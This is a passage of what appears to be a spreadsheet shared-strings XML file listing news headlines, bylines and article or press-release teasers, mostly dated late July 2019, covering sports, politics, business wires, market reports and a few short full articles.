    <t>The only girl at the LLWS ... "The last time I saw that much blond hair throwing that hard, it was [Noah] Syndergaard," said Clint Hurdle...</t>
  </si>
  <si>
    <t>The National League's second-oldest ballpark is getting a nine-figure facelift. The Los Angeles Dodgers unveiled plans Tuesday for a...</t>
  </si>
  <si>
    <t>A day before Robert Mueller's eagerly anticipated congressional testimony, a senior Democratic US lawmaker has accused President Donald...</t>
  </si>
  <si>
    <t>LANSING, Mich. (AP) — One of two Michigan parents accused of punishing their five children with whippings and confinement in a dark, locked...</t>
  </si>
  <si>
    <t>OAKLAND, Calif., July 29, 2019 (GLOBE NEWSWIRE) -- DASAN Zhone Solutions, Inc. (NASDAQ: DZSI), a global leader in fiber access...</t>
  </si>
  <si>
    <t>NASHVILLE, Tenn., July 22, 2019 /PRNewswire/ -- GoNoodle and RespectAbility are collaborating to bring more disabled diversity to digital...</t>
  </si>
  <si>
    <t>SAN JOSE, Calif., July 24, 2019 (GLOBE NEWSWIRE) -- NETGEAR, Inc. (NASDAQ: NTGR), a global networking company that delivers innovative...</t>
  </si>
  <si>
    <t>TORONTO, July 31, 2019 (GLOBE NEWSWIRE) -- Ayr Strategies Inc. (NEO:AYR.A, OTCQX:AYRSF) (Ayr), a vertically-integrated cannabis...</t>
  </si>
  <si>
    <t>Former Special Counsel Robert Mueller Testifies On Capitol Hill Mueller talked about his two year investigation into Russian interference...</t>
  </si>
  <si>
    <t>NEW YORK (AP) — The Connecticut Sun has risen back to the top of the WNBA standings behind solid play from Jonquel Jones and Alyssa Thomas....</t>
  </si>
  <si>
    <t>Dan Palmer</t>
  </si>
  <si>
    <t>Nepal recorded their first victory of the International Cricket Council (ICC) Men's T20 World Cup Asian Regional Finals Qualifier as they...</t>
  </si>
  <si>
    <t>Share This: Lawo provided its latest technology to support the event. PARIS – The Concert de Paris, a major classical music event held near...</t>
  </si>
  <si>
    <t>By Elizabeth Winn</t>
  </si>
  <si>
    <t>Don’t miss our updates:</t>
  </si>
  <si>
    <t>PHILADELPHIA --(BUSINESS WIRE) Aramark is launching an exclusive new WearGuard® Eco Collection that offers an apparel solution for...</t>
  </si>
  <si>
    <t>Natasha Dado</t>
  </si>
  <si>
    <t>11-year-old Alaya Wedlow missing since Friday evening</t>
  </si>
  <si>
    <t>Valeri "Vako" Qazaishvili and Shea Salinas scored and the San Jose Earthquakes won their fourth in a row with a 3-1 victory over the...</t>
  </si>
  <si>
    <t>The Latest on a shooting at a food festival in Northern California (all times local):</t>
  </si>
  <si>
    <t>Mallory Hughes, CNN</t>
  </si>
  <si>
    <t>Hospital often uses special edition clothing</t>
  </si>
  <si>
    <t>A rooftop restaurant hides in plain sight atop Vienna's Palace of Justice.</t>
  </si>
  <si>
    <t>EssilorLuxottica , the world's largest eyewear maker, announced on Wednesday it is buying Dutch optical retailer GrandVision in a cash...</t>
  </si>
  <si>
    <t>An earthquake woke up early Sunday morning for those in Zakynthos. The seismic vibration was 3.9 degrees on the Richter scale and was...</t>
  </si>
  <si>
    <t>A prominent critic of Boris Johnson has quit the Government, hitting out at the “haphazard and ramshackle” would-be prime minister. Sir...</t>
  </si>
  <si>
    <t>MidCoast Council has partnered with Kanopy, the on-demand streaming service, to provide library members access to more than 30,000 films...</t>
  </si>
  <si>
    <t>Global “Titanium Market” 2019 Industry Research Report is a professional and in-depth study on the current state of the Global Titanium...</t>
  </si>
  <si>
    <t>Business Wire,</t>
  </si>
  <si>
    <t>Conference Offers Slate of Diverse, International Speakers CHICAGO--(BUSINESS WIRE)-- SIGGRAPH 2019, kicking off next week, announces...</t>
  </si>
  <si>
    <t>SONOMA, Calif., July 26, 2019 /PRNewswire-PRWeb/ -- On Thursday July 25th, Free Flow Wines celebrated their 10-year anniversary and 6th...</t>
  </si>
  <si>
    <t>Immigration Immigration policy needs fix to allow more foreign workers By Tony...</t>
  </si>
  <si>
    <t>Eric Woodyard</t>
  </si>
  <si>
    <t>Los Angeles Lakers forward Kyle Kuzma speaks to kids at the YMCA of Greater Flint on Wednesday, July 24, 2019, during his homecoming event,...</t>
  </si>
  <si>
    <t>Kerrie Kennedy</t>
  </si>
  <si>
    <t>Student and youth travel organisation STA Travel has teamed up with international student marketing business Study in the USA...</t>
  </si>
  <si>
    <t>SPRINGFIELD -- As more states move to legalize the use of marijuana and other cannabis-related substances, state officials across the country are urging the U.S. Food and Drug Administration to move toward regulating the manufacturing and marketing of those products.</t>
  </si>
  <si>
    <t>SPRINGFIELD -- As more states move to legalize the use of marijuana and other cannabis-related substances, state officials across the...</t>
  </si>
  <si>
    <t>Chris Knight                        More from Chris Knight;Unobstructed View</t>
  </si>
  <si>
    <t>A still from Tel Aviv on Fire. Unobstructed View</t>
  </si>
  <si>
    <t>HAUPPAUGE, N.Y., July 23, 2019 /PRNewswire/ -- Advances in technology are always met with prospects: what this can be used for, what the...</t>
  </si>
  <si>
    <t>Jason Cipriani</t>
  </si>
  <si>
    <t>We hope this is something you never need.</t>
  </si>
  <si>
    <t>Rogers will have his contract selected from Triple-A Toledo prior to Tuesday's game against the Angels, Anthony French of the Detroit Free...</t>
  </si>
  <si>
    <t>GARDNERVILLE, Nev. (AP) — A former campaign manager for President Trump will be one of the featured speakers this fall at a big Republican...</t>
  </si>
  <si>
    <t>Liberal Party veteran Kathryn Greiner has demanded Scott Morrison pick up the phone and call prominent Australians to ask for help with...</t>
  </si>
  <si>
    <t>RESEARCH Open Access A detrimental role of RelB in mature oligodendrocytes during experimental acute encephalomyelitis Angela S. Gupta1,...</t>
  </si>
  <si>
    <t>ITASCA, Ill., July 31, 2019 /PRNewswire/ -- In recognition of National Heatstroke Prevention Day on July 31, the National Safety Council...</t>
  </si>
  <si>
    <t>Nick Farrell</t>
  </si>
  <si>
    <t>Samsung's first foldable smartphone will go on sale in September after problems with the device delayed its initial release.</t>
  </si>
  <si>
    <t>Spectrum News NY1</t>
  </si>
  <si>
    <t>Director Stefon Bristol sat down with Errol Louis to discuss his new Netflix film “See You Yesterday,” which is set in Brooklyn and the...</t>
  </si>
  <si>
    <t>James Mickleboro</t>
  </si>
  <si>
    <t>At the weekend I wrote about how an investment of $20,000 in a number of popular ASX shares had fared over the last decade. One of those...</t>
  </si>
  <si>
    <t>STROUDSBURG, PA / ACCESSWIRE / July 25, 2019 / ESSA Bancorp, Inc. (the “Company”) (NASDAQ: ESSA), the holding company for ESSA Bank &amp;...</t>
  </si>
  <si>
    <t>Sofia Laratta | Communications Assistant</t>
  </si>
  <si>
    <t>Credit: Tourism Vancouver/ Hubert Kang Vancouver’s natural beauty is a photographer’s dream come true. Along with its nature, Vancouver has an abundance of picturesque street art and restaurants that have caught the eye of Instagram lovers, bloggers, journalists, locals, and visitors alike. Here is a list of some of the most photogenic restaurants and street art in Vancouver: Restaurants Hotel Belmont | Created with the millennial in mind, Hotel Belmont is an Instagram playground. La Pentola | Not only known for their trendy décor but also their ever-changing Instagram mural on the restaurants exterior. Botanist | The botanical inspiration is showcased throughout the interior. Olive + Ruby | White walls, hanging plants, swinging chairs, and neon signs. Enough said. La Casa Gelato | There are almost 300 flavors of gelato in-store, in turn, making it difficult to choose which one you will photograph in front of their giant exterior pink wall. Blossom Dim Sum &amp; Grill | The velvet upholstery and cherry blossom mural speaks for itself. Street Art Alley Oop | 688 W Hastings Street | A Downtown Vancouver alley turned public art walk/basketball court/Instagram favorite. Fun Alley | 106 W 1st Street, North Vancouver | A colorful corner perfect for photos in North Vancouver’s Lower Lonsdale neighborhood. Kitsilano Wings | corner of Burrard Street and West 4th Avenue | A 40 foot by 25 foot mural in the heart of Kitsilano. Rainbow Mural | 2321 Granville Street | Inspired by a series of artwork by Kristofir Dean, an Ontario-based artist. Giants | 1531 Johnston Street, Granville Island | Artists OSGEMEOS from Brazil painted a 360-degree mural decorating six giant silos on Granville Island. Vancouver Mural Festival | August 1 – 10, 2019 | A ten-day festival organized by Create Vancouver Society, a Registered Non-Profit dedicated to artistic and cultural development in the Lower Mainland. Festival-goers are invited to admire 25+ new murals and enjoy live music and art alongside beer gardens, food trucks, markets, and much more. For more information, click here.</t>
  </si>
  <si>
    <t>Gain Therapeutics SA, a biotechnology company discovering and developing novel therapeutics to target lysosomal enzymes involved in inborn...</t>
  </si>
  <si>
    <t>Natalie Imbruglia is pregnant with her first child at the age of 44 with the help of IVF and a sperm donor. The singer-songwriter said...</t>
  </si>
  <si>
    <t>More than £2 billion has been earmarked to spend on no-deal Brexit preparations as Boris Johnson’s Government steps up efforts ahead of the...</t>
  </si>
  <si>
    <t>Jackson Cote, CNN</t>
  </si>
  <si>
    <t>Former senator out over misconduct allegations</t>
  </si>
  <si>
    <t>Andrew Nordseth has joined the global design and engineering firm Stantec as transportation program manager in Minneapolis, Minnesota....</t>
  </si>
  <si>
    <t>AVX Co. (NYSE:AVX) announced a quarterly dividend on Thursday, July 25th, Fidelity reports. Investors of record on Thursday, August 1st...</t>
  </si>
  <si>
    <t>t</t>
  </si>
  <si>
    <t>Nick Ahmed hit a grand slam and an RBI double, leading the Arizona Diamondbacks to a 9-2 win over the Miami Marlins</t>
  </si>
  <si>
    <t>Orford Announces Board Appointment</t>
  </si>
  <si>
    <t>Simon Sharwood</t>
  </si>
  <si>
    <t>Case management system due online in 2021.</t>
  </si>
  <si>
    <t>NEW YORK, July 31, 2019 (GLOBE NEWSWIRE) -- Pomerantz LLP is investigating claims on behalf of investors of Granite Construction...</t>
  </si>
  <si>
    <t>California Resources Corporation (NYSE: CRC) and Colony Capital, Inc. (NYSE: CLNY) through its energy investment management arm, Colony HB2...</t>
  </si>
  <si>
    <t>Heather Rushmore, a single mother and an avid reader, has completed her new book, “Murphy's Law: Mustang Murder”: a riveting book that...</t>
  </si>
  <si>
    <t>Rappers Dave, Slowthai and Little Simz, and rock groups Idles, The 1975 and Foals are among those shortlisted for the Mercury Prize. Some...</t>
  </si>
  <si>
    <t>Staff Northeast |</t>
  </si>
  <si>
    <t>CLEVELAND, Ohio — cleveland.com readers can comment below on crime &amp; court stories appearing on the website on Wednesday, July 24, 2019. We...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / July 24, 2019 / The Klein Law Firm announces that class action complaints have been filed on behalf of...</t>
  </si>
  <si>
    <t>Hyperpigmentation Disorders Treatment Market Research Report 2019 by Treatment Type (Topical Drugs, Chemical Peels, and Laser Therapy), by...</t>
  </si>
  <si>
    <t>San Jose, CA, July 30, 2019 --(PR.com)-- Center for Inner Resources Development - North America (CIRD-NA), a non-profit global knowledge...</t>
  </si>
  <si>
    <t>MORRISTOWN, N.J. (AP) — A former New Jersey prosecutor portrayed by actor Russell Crowe in the film "American Gangster" has pleaded guilty...</t>
  </si>
  <si>
    <t>UCCR and CCMC acknowledges long term partnership for music camp in the foothills of California PETALUMA, Calif. (PRWEB) July 31, 2019 In...</t>
  </si>
  <si>
    <t>Matt Allan</t>
  </si>
  <si>
    <t>Vauxhall warns Ellesmere Port plant could close under no-deal Brexit</t>
  </si>
  <si>
    <t>Naomi Campbell has claimed she was barred from a hotel because of the colour of her skin. The 49-year-old supermodel has alleged that she...</t>
  </si>
  <si>
    <t>Pakistan paceman Mohammad Amir has announced his retirement from Test cricket aged just 27. The left-armer returned to Pakistan’s Test...</t>
  </si>
  <si>
    <t>Thessaloniki: They keep the television open … the newspaper The homeowners of the orchestro relaxed. Suddenly a movement in the garden got...</t>
  </si>
  <si>
    <t>BATON ROUGE, La., July 30, 2019 (GLOBE NEWSWIRE) -- Investar Holding Corporation (Nasdaq:ISTR) (“Investar”), and its wholly-owned...</t>
  </si>
  <si>
    <t>A Tennessee city is accused of violating the civil rights of its police department when it abruptly disbanded the agency last month.</t>
  </si>
  <si>
    <t>Playmaker Christian Lealiifano will make a remarkable return for the Wallabies on Saturday while James O'Connor is also set to make his...</t>
  </si>
  <si>
    <t>Renee Jackson</t>
  </si>
  <si>
    <t>Cal-Maine Foods (NASDAQ:CALM) announced its quarterly earnings data on Monday. The basic materials company reported ($0.41) earnings per...</t>
  </si>
  <si>
    <t>Studies show that the anticipation of a vacation is almost as important as the actual trip. That’s why planning is a key part of any trip...</t>
  </si>
  <si>
    <t>NEW YORK, July 25, 2019 /PRNewswire/ -- Angiography Devices market worldwide is projected to grow by US$3. 6 Billion, guided by a...</t>
  </si>
  <si>
    <t>Global shares eased on Monday and the dollar hit a two-month high against a basket of currencies as markets counted down to a likely cut in...</t>
  </si>
  <si>
    <t>Dublin, July 30, 2019 (GLOBE NEWSWIRE) -- The "Nigeria Mobile Wallet and Payment Market Opportunities (Databook Series) - Market Size...</t>
  </si>
  <si>
    <t>London’s FTSE 100 stock-market index looks cheap on the fundamentals.</t>
  </si>
  <si>
    <t>Traverso Chambers Private Wealth Management LLC acquired a new position in Invesco 1-30 Laddered Treasury ETF (NASDAQ:PLW) in the second...</t>
  </si>
  <si>
    <t>Written by ACN Newswire</t>
  </si>
  <si>
    <t>SINGAPORE, Jul 24, 2019 - (ACN Newswire) - SGX-listed Singapore eDevelopment Ltd ("SeD", SGX:40V) is pleased to announce the results of...</t>
  </si>
  <si>
    <t>PutinCoin (CURRENCY:PUT) traded up 3.5% against the dollar during the one day period ending at 0:00 AM ET on July 24th. PutinCoin has a...</t>
  </si>
  <si>
    <t>Michael J. Hicks The Federal Reserve Open Market Committee meets this week to consider whether to ease the money supply. The most obvious...</t>
  </si>
  <si>
    <t>Press Association</t>
  </si>
  <si>
    <t>Anti-discrimination charity Kick It Out has praised Chelsea boss Frank Lampard after he condemned his club’s supporters for referring to...</t>
  </si>
  <si>
    <t>She is a federally funded scientist, widely-acclaimed for her work in improving outcomes for lung transplant patients</t>
  </si>
  <si>
    <t>ATLANTA, GA / ACCESSWIRE / July 23, 2019 / As an insurance company, mitigating risk and assisting people in their time of need is core to...</t>
  </si>
  <si>
    <t>Written by Jessica Nico</t>
  </si>
  <si>
    <t>THE cold, wintry weather is having no effect on the WA Mums Cottage’s (WAMC) bumper program of activities and events. On top of keeping...</t>
  </si>
  <si>
    <t>Sater said he's hopeful any risk to his safety will fade as time goes by.</t>
  </si>
  <si>
    <t>NEW YORK (AP) — Newly unsealed court records confirm that Felix Sater, a former business associate of President Donald Trump, was an...</t>
  </si>
  <si>
    <t>Once home to the Schlitz and Blatz breweries of Milwaukee, Brewers’ Hill is a highly diverse neighborhood in the North of the city. In...</t>
  </si>
  <si>
    <t>MEADVILLE, Pa., July 25, 2019 /PRNewswire-PRWeb/ -- "Divine Inspirations: Sent by God Scribed by Uncle Ponytail": a mind-clearing craft...</t>
  </si>
  <si>
    <t>CHATHAM, N.J. and MUMBAI, India, July 25, 2019 /PRNewswire/ -- DriveWealth, LLC, a U.S. based leader in global digital trading technology,...</t>
  </si>
  <si>
    <t>Century Financial Corp PA (OTCMKTS:CYFL)’s stock price shot up 0.5% during mid-day trading on Tuesday . The company traded as high as...</t>
  </si>
  <si>
    <t>PARALIMNI, Cyprus (AP) — A Cyprus court on Tuesday adjourned for one week the legal proceedings against a 19-year-old British woman who...</t>
  </si>
  <si>
    <t>Avalanche Girls Fastpitch Travel Softball will be holding tryouts for its five squads in a bid to fill positions on all of the program’s...</t>
  </si>
  <si>
    <t>The "Supermarkets And Hypermarkets Global Market Report 2019" report has been added to ResearchAndMarkets.com's offering. Global...</t>
  </si>
  <si>
    <t>Originally posted on https://www.minds.com/Sugamcym/blog/how-to-help-someone-going-through-addiction-recovery-992169168271667200 Helping...</t>
  </si>
  <si>
    <t>Per the Virginia Nonstock Act sections referenced in this post, the board of directors of an incorporated non-stock association is charged...</t>
  </si>
  <si>
    <t>by Hayden Johnson</t>
  </si>
  <si>
    <t>A MAYORAL candidate has declared a hydropower station in the Bremer River will protect the city from flood and improve water quality. The...</t>
  </si>
  <si>
    <t>VANCOUVER, July 30, 2019 /PRNewswire/ - Pan American Silver Corp. (NASDAQ: PAAS) (TSX: PAAS) ("Pan American" or the "Company") is pleased...</t>
  </si>
  <si>
    <t>CHICAGO (CBS) — New hidden fees charged by hundreds of hotels are stirring outrage for travelers, and the nation’s capital is even suing...</t>
  </si>
  <si>
    <t>LANCASTER, Pa.--(BUSINESS WIRE)--Armstrong Flooring, Inc. (NYSE: AFI) (“Armstrong Flooring” or the “Company”), North America’s largest...</t>
  </si>
  <si>
    <t>NFL Network's Steve Wyche and LaDainian Tomlinson discuss expectations for Atlanta Falcons quarterback Matt Ryan in 2019.</t>
  </si>
  <si>
    <t>Cindy Kellogue</t>
  </si>
  <si>
    <t>CIBC reissued their market perform rating on shares of QEP Resources (NYSE:QEP) in a research report sent to investors on Tuesday, July...</t>
  </si>
  <si>
    <t>Brandpoint Lifestyle - RSS XMWare</t>
  </si>
  <si>
    <t>(BPT) - Fresh ingredients can turn any meal into a masterpiece. But there’s nothing more disappointing than finding fresh, farmer’s market...</t>
  </si>
  <si>
    <t>PROVIDENCE, R.I., July 24, 2019 (GLOBE NEWSWIRE) -- Upserve, the leading restaurant management platform, today announced an...</t>
  </si>
  <si>
    <t>The project, to be completed by 2021, will also have the county's first underwater tunnel The 5-km stretch between Salt Lake and Howrah...</t>
  </si>
  <si>
    <t>Milwaukee, July 30, 2019 (GLOBE NEWSWIRE) -- The personal injury law firm of Hupy and Abraham, S.C. is proud to announce that firm...</t>
  </si>
  <si>
    <t>By Darrell Smith</t>
  </si>
  <si>
    <t>More than a dozen Marines allegedly tied to human smuggling were arrested at Camp Pendleton in an early morning sweep Thursday, officials...</t>
  </si>
  <si>
    <t>Rennie Bradshaw</t>
  </si>
  <si>
    <t>Automatic Speech Recognition (ASR) Software Market analysis report speaks about the manufacturing process. Automatic Speech Recognition...</t>
  </si>
  <si>
    <t>Chris Finch</t>
  </si>
  <si>
    <t>NEW ORLEANS (WVUE) - The number one pick in the 2019 NBA draft and new Pelicans star Zion Williamson has signed with the Jordan Brand. The...</t>
  </si>
  <si>
    <t>Brody Fernandez</t>
  </si>
  <si>
    <t>OROVILLE — Butte County residents can now make an appointment to drop off their unneeded vehicle tires. Free drop-offs of waste tires will...</t>
  </si>
  <si>
    <t>KENTLAND, Ind. (AP) — A man accused of abusing calves at an Indiana dairy farm that's a popular agritourism destination is in federal...</t>
  </si>
  <si>
    <t>Vail, Colorado, July 31, 2019 (GLOBE NEWSWIRE) -- Dr. Leslie Vidal, an accomplished orthopaedic surgeon who has practiced in the Denver...</t>
  </si>
  <si>
    <t>A man is dead following a motorcycle crash in Wellesley Township. The accident happened on Lobsinger Line around 12:15 p.m. on Saturday....</t>
  </si>
  <si>
    <t>NEW YORK, July 23, 2019 /PRNewswire/ -- Global Gastrointestinal Bleeding Treatment Market: Overview The global gastrointestinal bleeding...</t>
  </si>
  <si>
    <t>LONDON (Reuters) - Britain's Prince George turned six on Monday with his parents releasing pictures of their grinning eldest son wearing an...</t>
  </si>
  <si>
    <t>ETFdb</t>
  </si>
  <si>
    <t>The majority of the FANG stocks, Facebook ( FB ), Amazon ( AMZN ), and Alphabet ( GOOGL ), which represent a collective $2.3 trillion in...</t>
  </si>
  <si>
    <t>“https://bit.ly/2K3R8ql” Beautiful girls can choose the perfect wedding dress from a large online shop for their own special design. Some...</t>
  </si>
  <si>
    <t>Bitcoin Turbo Koin (CURRENCY:BTK) traded up 15.4% against the U.S. dollar during the 1 day period ending at 21:00 PM Eastern on July 24th....</t>
  </si>
  <si>
    <t>Recognized as a global expert in the emerging field of antimicrobial photodynamic therapy, Dr. Nicolas Loebel, President and Chief...</t>
  </si>
  <si>
    <t>Geraint Thomas said on Saturday night he believed Julian Alaphilippe deserved a podium spot after his electrifying ride lit up the Tour de...</t>
  </si>
  <si>
    <t>ATLANTA, July 30, 2019 /PRNewswire/ -- Novelis Inc. will report its earnings for the first quarter of fiscal year 2020 on Tuesday, August...</t>
  </si>
  <si>
    <t>SAN DIEGO, CA / ACCESSWIRE / July 25, 2019 / Calidi Biotherapeutics, Inc., a clinical‐stage biotechnology company at the forefront of...</t>
  </si>
  <si>
    <t>Gopi</t>
  </si>
  <si>
    <t>Sriharikota (Andhra Pradesh), July 22 (IANS) Setting in place India's bid to return to the moon, the Indian space agency's heavy lift...</t>
  </si>
  <si>
    <t>A top-10 world ranking is the potential prize on offer for Jai Opetaia, one of Australia's hottest boxing prospects. The classy 24-year-old...</t>
  </si>
  <si>
    <t>PuristsWatchprosite</t>
  </si>
  <si>
    <t>Watchprosite- Or is it a piece that I should stay away due to a possibility of non original dial or incorrect hands or parts? Lately my...</t>
  </si>
  <si>
    <t>An anonymous mother, The Sunday Telegraph</t>
  </si>
  <si>
    <t>Health Minister on hospital stoush: ‘No one has died yet’ ‘Hidden’ sugar blamed for rise in kids’ tooth decay What are they waiting for?...</t>
  </si>
  <si>
    <t>VITE (CURRENCY:VITE) traded down 10.5% against the dollar during the one day period ending at 15:00 PM E.T. on July 27th. One VITE token...</t>
  </si>
  <si>
    <t>The Associated Press The New Jersey Devils acquired left wing Nikita Gusev from the Vegas Golden Knights and signed him to a two-year...</t>
  </si>
  <si>
    <t>Worldwide Bursting Disc Market 2019 Industry report provides key statistics on the market status of the Bursting Disc top manufacturers,...</t>
  </si>
  <si>
    <t>LOS ANGELES, July 29, 2019 /PRNewswire/ -- Today Chance The Rapper announced his highly-anticipated return to the road with The Big Day,...</t>
  </si>
  <si>
    <t>I am stuck in my bed today. I’m not feeling good and missed my training schedule for a home-based job. If I am in my 20’s I will still drag...</t>
  </si>
  <si>
    <t>Brian Lilley</t>
  </si>
  <si>
    <t>One of the arguments gun control advocates will make for calling for an outright ban on handguns or certain rifles is that if regular...</t>
  </si>
  <si>
    <t>The "Automotive Display System Market: Global Industry Analysis, Trends, Market Size, and Forecasts up to 2025" report has been added to...</t>
  </si>
  <si>
    <t>England and Tottenham captain Harry Kane admits it will take all summer to recover from the “hurt” of two painful defeats for club and...</t>
  </si>
  <si>
    <t>Tuesday night's debate in Detroit put the Democratic party's ideological divide front and center. CBSN political reporter Caitlin...</t>
  </si>
  <si>
    <t>scotsman</t>
  </si>
  <si>
    <t>0 Have your say Hidden away in land-locked office blocks lies Glasgow’s global maritime power, reveals Alastair Dalton. Glasgow’s fame as...</t>
  </si>
  <si>
    <t>Usa science news</t>
  </si>
  <si>
    <t>DOJ antitrust chief Makan Delrahim speaks at a 2018 roundtable on antitrust consent decrees. (DOJ Photo) The Department of Justice...</t>
  </si>
  <si>
    <t>‘Jane the Virgin’ finale on The CW...</t>
  </si>
  <si>
    <t>SAN DIEGO, July 29, 2019 (GLOBE NEWSWIRE) -- Turning Point Therapeutics, Inc. (NASDAQ: TPTX), a precision oncology company developing novel...</t>
  </si>
  <si>
    <t>CLAYTON, Mo., July 25, 2019 /PRNewswire/ -- Today, Olin Corporation's (NYSE: OLN) Board of Directors declared a quarterly dividend of $0.20...</t>
  </si>
  <si>
    <t>LAS VEGAS (AP) — Dearica Hamby scored 24 points to lead five Las Vegas starters in double figures and the Aces beat the Seattle Storm 79-62...</t>
  </si>
  <si>
    <t>By Jessie Meyen</t>
  </si>
  <si>
    <t>A 2016 graduate of Monticello High School is being recognized for his commitment to community service. Danny Munoz, Bethel football athlete...</t>
  </si>
  <si>
    <t>Batavia, New York BATAVIA, N.Y. (AP) -- Logan O'Hoppe hit a two-run double in the sixth inning, leading the Williamsport Crosscutters to a...</t>
  </si>
  <si>
    <t>Trump mocks progressive 'Squad' member Rep. Rashida Tlaib at a summit for the conservative student group Turning Point USA.</t>
  </si>
  <si>
    <t>TORONTO — Canadians Leylah Annie Fernandez and Eugenie Bouchard will join Maria Sharapova and Venus Williams as wild-card entries at the upcoming Rogers Cup women's event in Toronto. Tennis Canada announced the additions to the tournament's main draw Wednesday. Fernandez, from Laval, Que., will be making her Rogers Cup main draw debut after losing in the final round of qualifying in Montreal last year. The 16-year-old is ranked 257th in the world but is coming off string of impressive results. She won the women's junior title at the French Open last month and recently earned her first two professional titles, winning in both women's singles and doubles competition at the Gatineau National Bank Challenger. She also reached the singles final at last week's Granby Challenger. Bouchard, ranked 114th in the world, will be competing at the Rogers Cup for a 12th time, with her best result coming in 2016 when she reached the third round. The 25-year-old reached has made runs to the quarterfinals in two WTA tournaments since the start of the year but has struggled overall with a 6-11 record on the season. The Canadians will join world no. 26 Bianca Andreescu of Mississauga, Ont., in the main draw. After a strong start to the season that included a title at Indian Wells, the 19-year-old Andreescu has played just one match since late March due to a shoulder injury. Sharapova and Williams, both formerly ranked No. 1 in the world, have a combined 12 Grand Slam titles. Williams is currently ranked 50th in the world, and Sharapova is 82nd. Tennis Canada said Vancouver's Rebecca Marino of Vancouver is missing the tournament with a nagging foot injury. Marino recently finished play at the Pan American Games in Lima, Peru, after losing her first-round women's singles match. Tennis Canada said a fifth wild-card spot will be filled at a later date. Toronto's Katherine Sebov, Montreal's Francoise Abanda, Carol Zhao of Richmond Hill, Ont., and Ottawa's Gabriela Dabrowski were awarded spots in the qualifying competition. The event will take place at the Aviva Centre in Toronto from Aug. 3 to 11. The Canadian Press</t>
  </si>
  <si>
    <t>The Money Flow Index of Target Hospitality Corp. Warrant (THWWW) this week has place the shares on the radar as it nears the key 20 or...</t>
  </si>
  <si>
    <t>BEIJING, July 24, 2019 (GLOBE NEWSWIRE) -- Niu Technologies (“NIU”, or “the Company”) (NASDAQ: NIU), a leading provider of smart urban...</t>
  </si>
  <si>
    <t>SAO PAULO — Brazilian police said on Tuesday they had recommended that rape charges not be filed against soccer star Neymar, after a woman he met online said he flew her to Paris and assaulted her in a hotel there. Neymar denied the accusations and as part of his public response he released private chats and lurid photos they had exchanged. That led to a separate police inquiry into whether he had committed a crime by posting the intimate pictures online. (Reporting by Pablo Garcia Writing and additonal reporting by Marcelo Rochabrun, Editing by Franklin Paul)</t>
  </si>
  <si>
    <t>Dallas Cowboys running back Ezekiel Elliott missed the opening of training camp on Friday, not present for the team physical or a...</t>
  </si>
  <si>
    <t>Board declares third quarter dividend on common and preferred stock, and authorizes $100 million stock repurchase program</t>
  </si>
  <si>
    <t>Acacia Communications, Inc. (ACIA) Lifshitz &amp; Miller announces investigation into possible breach of fiduciary duties in connection with...</t>
  </si>
  <si>
    <t>LITTLE ROCK, Ark. (AP) — Leaders of a small Arkansas city are planning to draft an ordinance next month addressing a problematic rooster...</t>
  </si>
  <si>
    <t>Glen Korstrom</t>
  </si>
  <si>
    <t>Seven stores are currently open in the province’s largest city, as B.C.’s slow rollout of legal stores continues</t>
  </si>
  <si>
    <t>Letters to the editor</t>
  </si>
  <si>
    <t>Levine stood up to PG&amp;E bailout bill Recently, at the urging of Governor Gavin Newsom, the California Legislature raced to pass AB 1054, a...</t>
  </si>
  <si>
    <t>GAZA, July 26 (Reuters) - Israeli forces shot and killed a Palestinian on Friday afternoon during weekly protests along the border with...</t>
  </si>
  <si>
    <t>Republican Rep. Pete Olson of Texas says he won't seek re-election in 2020, giving up his House seat that Democrats were already targeting...</t>
  </si>
  <si>
    <t>The "Molecular Diagnostics - Technologies, Markets and Companies" report from Jain PharmaBiotech has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>Lachlan Bennett</t>
  </si>
  <si>
    <t>A national search is under way for a new festival that celebrates something unique, great or famous about an Australian town or region....</t>
  </si>
  <si>
    <t>Former world champion Nico Rosberg believes Sebastian Vettel is struggling to enjoy life at Ferrari. The four-time world champion heads...</t>
  </si>
  <si>
    <t>COSTA MESA, Calif., July 25, 2019 /PRNewswire/ -- South Coast Plaza pays tribute to the internationally renowned architect, Cesar Pelli,...</t>
  </si>
  <si>
    <t>BOGOTA, Colombia (AP) — The U.S. on Thursday imposed sanctions on three stepsons of Venezuelan President Nicolás Maduro, accusing them of...</t>
  </si>
  <si>
    <t>TEL AVIV, Israel, July 23, 2019 /PRNewswire/ -- Stero Biotechs, an Israel-based, clinical-stage company focused on Cannabidiol (CBD)...</t>
  </si>
  <si>
    <t>by The Sun</t>
  </si>
  <si>
    <t>Meghan, Duchess of Sussex and Prince Harry could be splashing out on a second home, this one in the US, so they can be closer to her mum...</t>
  </si>
  <si>
    <t>Sterling Construction Company, Inc. (NasdaqGS: STRL) (“Sterling” or “the Company”) today announced that it plans to issue its financial...</t>
  </si>
  <si>
    <t>Tim Murtagh was at a loss to comprehend his “dream” five-wicket haul as Ireland skittled out red-faced England for 85 runs at Lord’s. The...</t>
  </si>
  <si>
    <t>NEW YORK, July 31, 2019 /PRNewswire/ -- Following the conclusion of the Fortnite World Cup tournament, eSports enthusiasts have now turned...</t>
  </si>
  <si>
    <t>BIRMINGHAM, Mich., July 25, 2019 (GLOBE NEWSWIRE) — Conifer Holdings, Inc. (Nasdaq:CNFR) will hold a conference call/webcast on Thursday,...</t>
  </si>
  <si>
    <t>The Metropolitan Police are facing a new row over their disastrous investigation into claims of a murderous VIP paedophile ring. War...</t>
  </si>
  <si>
    <t>Humana Inc. (NYSE: HUM), one of the nation’s leading health and well-being companies, is furthering its commitment to provide veterans with...</t>
  </si>
  <si>
    <t>Ten years ago, two California professors had an idea: What if they could find a way to connect children on both sides of the U.S.-Mexico...</t>
  </si>
  <si>
    <t>CALGARY, Alberta, July 23, 2019 (GLOBE NEWSWIRE) -- (PIPE – TSX-V) Pipestone Energy Corp. (“Pipestone Energy” or the “Company”) is pleased...</t>
  </si>
  <si>
    <t>Stocks News Feed</t>
  </si>
  <si>
    <t>WASHINGTON, July 25, 2019 /PRNewswire/ — Airlines for America (A4A), the industry trade organization for the leading U.S. airlines, today...</t>
  </si>
  <si>
    <t>SOURCE Boeing CHICAGO, July 24, 2019 /PRNewswire/ -- Continue to engage global regulators and customers on safe return to service of the...</t>
  </si>
  <si>
    <t>CRISPR Therapeutics AG (NASDAQ:CRSP) CRISPR Therapeutics AG (NASDAQ:CRSP) closed at $51.92 on the last trading session with an increase of...</t>
  </si>
  <si>
    <t>Abigail Kellett</t>
  </si>
  <si>
